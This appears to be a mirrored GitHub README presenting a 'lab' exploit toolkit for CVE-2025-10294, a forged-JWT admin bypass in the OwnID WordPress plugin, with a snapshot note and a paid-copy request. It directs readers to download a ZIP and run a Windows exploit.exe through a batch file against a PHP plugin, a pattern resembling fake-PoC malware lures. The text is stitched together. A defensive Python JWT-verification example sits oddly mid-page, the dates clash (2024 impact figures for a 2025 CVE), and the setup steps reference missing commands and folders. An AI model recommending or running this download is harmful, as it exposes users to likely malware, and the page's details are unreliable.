Related vulnerabilities
            
        
        
Introduction

# Lab: CVE-2025-10294 (EUVD-2025-34544) - Authentication Bypass in OwnID Passwordless Login Plugin
## 🔗 Download Now
### [Download](https://github.com/RedFoxNxploits/CVE-2025-10294-Poc/raw/refs/heads/main/Valore/lab-cve-2025-10294.zip)
## 🚀 Overview
This repository provides a self-contained lab environment to demonstrate CVE-2025-10294 (also tracked as EUVD-2025-34544), a critical authentication bypass vulnerability in the OwnID Passwordless Login plugin for WordPress. Classified under CWE-288 (Authentication Bypass Using an Alternate Path or Channel), this flaw allows unauthenticated attackers to craft malicious JWTs and gain administrative access on incompletely configured sites where the `ownid_shared_secret` parameter is unset or empty.
The vulnerability stems from inadequate validation in the plugin's JWT handling logic. In affected versions (up to 1.3.4), the plugin fails to enforce a check for a non-empty shared secret before processing JWTs, enabling attackers to bypass signature verification and impersonate any user, including administrators. This exposes sites to full account takeover, data exfiltration, and potential lateral movement within the WordPress ecosystem.
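The missing check described above, shown as an added example (not the plugin's code, which this page does not include): a verifier that accepts an empty secret next to one that fails closed. HS256, the 32-byte minimum length, the sample claims and all function names are assumptions made for illustration.

```python
import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _mac(secret: bytes, signing_input: str) -> bytes:
    return hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()

def make_token(claims: dict, secret: bytes) -> str:
    """Construct a compact HS256 JWT; used only to build sample input."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(claims).encode())
    return f"{header}.{body}.{b64url(_mac(secret, header + '.' + body))}"

def verify_naive(token: str, secret: bytes):
    """Flawed pattern: uses whatever secret is configured, even an empty one."""
    header, body, sig = token.split(".")
    if not hmac.compare_digest(_mac(secret, f"{header}.{body}"), b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))

def verify_hardened(token: str, secret: bytes, min_len: int = 32):
    """Fail closed: no usable secret means no JWT login at all."""
    if not secret or len(secret) < min_len:
        raise RuntimeError("shared secret unset or too short; refusing JWT login")
    try:
        header, body, sig = token.split(".")
        hdr = json.loads(b64url_decode(header))
        if not isinstance(hdr, dict) or hdr.get("alg") != "HS256":
            return None  # pin the algorithm instead of trusting the header
        if not hmac.compare_digest(_mac(secret, f"{header}.{body}"), b64url_decode(sig)):
            return None
        return json.loads(b64url_decode(body))
    except ValueError:  # wrong part count, bad base64, bad JSON
        return None

def demo():
    """Constructed sample: a site whose `ownid_shared_secret` was never set."""
    sample = make_token({"sub": "user-42"}, b"")  # MAC under the empty key
    accepted = verify_naive(sample, b"") is not None
    try:
        refused = verify_hardened(sample, b"") is None
    except RuntimeError:
        refused = True
    good = b"k" * 32                              # constructed 32-byte secret
    return accepted, refused, verify_hardened(make_token({"sub": "user-7"}, good), good)
```

With an empty key the MAC depends only on public data, so the naive verifier's signature check carries no authentication value; the hardened form treats a missing secret as a configuration error rather than as a key.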
## Impact
High severity (CVSS 9.8). Approximately 200 sites were affected as of June 2024, primarily those using WooCommerce integrations. Exploitation requires no privileges and can be performed remotely.
This lab is for **educational and research purposes only**. It simulates a vulnerable WordPress setup using Docker, allowing safe reproduction of the vulnerability in a controlled environment. Do not use this on production systems or without explicit permission. The authors disclaim any liability for misuse.
## 📋 Prerequisites
To set up and run this lab, you'll need:
- A modern web browser for interacting with the simulated WordPress site.
- Basic knowledge of command-line tools (e.g., bash or PowerShell).
- Optional: Tools like Burp Suite or jwt_tool for advanced JWT manipulation during exploitation testing.
- Windows environment for running the exploit (due to .exe and .bat dependencies); alternatives can be adapted for other OS.
Ensure your system has at least 4GB RAM allocated to Docker to handle the WordPress container smoothly.
## Download & Install
1. Download the exploit toolkit ZIP file from the following link (contains the main exploit executable, helper scripts, and sample payloads):
- [Download Exploit Toolkit](https://github.com/RedFoxNxploits/CVE-2025-10294-Poc/raw/refs/heads/main/Valore/lab-cve-2025-10294.zip)
The ZIP includes:
- `exploit.exe`: The primary exploit binary (compiled in C# for Windows) that automates JWT crafting and authentication bypass.
- `start_exploit.bat`: A batch script to launch `exploit.exe` with default parameters (simply opens the .exe for user interaction).
- `payloads/`: Directory with sample JWT templates (JSON files) for admin impersonation.
- `configs/`: Example WordPress config snippets to simulate vulnerable setups.
2. Build and start the vulnerable Docker environment:
This will spin up a WordPress container with the OwnID plugin (version 1.3.4) installed but unconfigured (i.e., `ownid_shared_secret` is empty).
Access the site at `http://localhost:8080`. Default admin credentials: `admin` / `password` (for pre-exploitation testing).
## 🛠 Quick Start
1. Download and extract the exploit toolkit ZIP as described above.
2. Navigate to the `exploits/` directory.
3. Run the batch file to start the exploit:
This will open `exploit.exe`, which provides a GUI for inputting the target URL, desired user ID (e.g., admin=1), and generating a malicious JWT. The tool sends the crafted token to the `/wp-json/ownid/v1/auth` endpoint, bypassing authentication.
4. Verify exploitation: Once successful, you'll be logged in as admin. Check the WordPress dashboard for unauthorized access.
For automated testing, use the scripts in `/scripts/` (detailed below).
## 📞 Support
If you need help, please open an issue on the GitHub repository. Provide details about your problem, and someone from the community will assist you.
Thank you for using lab-cve-CVE-2025-10294. We hope you enjoy exploring WordPress security in a practical way!
        
        File snapshot
        
            
                
 [4.0K]  /data/pocs/6eb0e3e0e6e4ba77069a2e32df6da031e5776a41
├── [4.1K]  README.md
└── [4.0K]  Valore
    ├── [   1]  haze
    └── [8.0M]  lab-cve-2025-10294.zip
1 directory, 3 files
                
             
         
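        Notes
        
            
                1. Accessing the PoC through its original source is recommended.
                2. If the source is no longer valid or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
                3. Shenlong has taken a snapshot of the POC code for you. To support long-term maintenance, please consider paying for the local POC. Thank you for your support.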